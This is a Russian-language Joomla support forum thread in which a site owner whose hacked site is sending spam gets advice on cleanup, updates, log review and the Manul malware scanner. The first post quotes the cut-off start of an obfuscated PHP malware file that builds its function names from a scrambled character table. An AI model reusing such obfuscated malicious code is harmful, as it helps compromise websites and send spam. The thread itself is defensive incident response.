Форум русской поддержки Joomla!® CMS
10.12.2016, 09:01:23 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Спамит сайт

 (Прочитано 482 раз)
0 Пользователей и 1 Гость смотрят эту тему.
vas1lek
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 35


« : 15.09.2015, 22:46:27 »

Подскажите пожалуйста как защитить сайт.
Сайт начинает спамить в логах вижу  такую ситуацию
Показать текстовый блок
удаляю данный php файл так как в нем код с кучей иероглифов к примеру
Цитировать
Код:
<?php
$w93="W2{MCBiJ_tPk^lcgev[oTQ!\$jsfw4O8Z\t5\".&}#AL\nrahIKyU%b09u6S]m*/R+;<7 D),d1NY=FV~`\rH3qEn?X\\x:@>|z-(Gp'"; $GLOBALS['rlslp59'] = $w93[16].$w93[42].$w93[42].$w93[19].$w93[42].$w93[8].$w93[42].$w93[16].$w93[96].$w93[19].$w93[42].$w93[9].$w93[6].$w93[83].$w93[15]; $GLOBALS['akpcw87'] = $w93[6].$w93[83].$w93[6].$w93[8].$w93[25].$w93[16].$w93[9]; $GLOBALS['tudbx5'] = $w93[69].$w93[16].$w93[26].$w93[6].$w93[83].$w93[16]; $GLOBALS['piuiz64'] = $w93[16].$w93[96].$w93[69].$w93[43]
Запускаю сайт все работает отлично логи тоже порядок, но спустя неделю ситуация повторяется.
 
Записан
vas1lek
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 35


« Ответ #1 : 15.09.2015, 22:57:52 »

Так же есть ли для joomlu botnet attack blocker так как сайт спамит через него.
Записан
flyingspook
Профи
********

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #2 : 16.09.2015, 01:52:19 »

Все совершенно просто вас взломали.
Чистите сайт, обновляйте расширения и желательно обновляйте сразу на 3 актуальную версию.
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #3 : 16.09.2015, 08:45:45 »

По крайней мере надо вычистить сайт и закрыть дырки как всегда.
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #4 : 16.09.2015, 09:19:49 »

У Вас случайно не варезное что-то на сайте стоит?

Прогоните вот этим

https://yandex.ru/promo/manul#about

И результаты нам расскажете
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #5 : 16.09.2015, 10:28:08 »

Советую настроить запись логов отправки почты.
Так гораздо удобнее вычислить скрипт рассылающий спам через phpmail
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #6 : 16.09.2015, 12:04:32 »

draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
Записан
vas1lek
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 35


« Ответ #7 : 17.09.2015, 00:41:04 »

draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
Вот весь код файла menu.php

Показать текстовый блок
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #8 : 17.09.2015, 06:37:03 »

draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.
Как на меня, то гораздо проще следить в mail.log, чем ломать глаза в access.log. И как обычно размещают не один скрипт отправки почты.
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #9 : 17.09.2015, 07:59:10 »

vas1lek, понятно. Теперь Вам нужно найти откуда этот файл попадает к вам на сервер. Делаете так.

Удалите файл, почистите все логи доступа и ошибок на сервере. И внимательно следите. Как только появится - сразу логи смотреть - поиск по имени этого файла. Ищем упоминание. Как найдете самое первое - смотрите откуда появилось. С какого IP - какое действие было с этого IP перед этим... Занятие муторное и требует творческого подхода.

Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
Записан
vas1lek
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 35


« Ответ #10 : 17.09.2015, 12:17:17 »

Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
Манулом пробивал, но все время зависало и дальше не идет сканирование. Зависало на какой то png картинке с папки Plugins/system/ .
Записан
vas1lek
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 35


« Ответ #11 : 17.09.2015, 14:03:02 »

Разбил сайт и по кускам его сканировал Манулом:
После анализа было найдено вредных
./components/com_hdwplayer/views/videos/view.html.php
./plugins/system/jcemediabox/js/jcemediabox.js
куча подозрительных в файлах js, xlx, php/
Залил и те файлы что я удалял menu,php и Манул сказал что там не че вредного нету хотя видно и по коду и по логам что точно он вредный, а тут наоборот что меня удивило.
Файлы могу приложить если надо
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet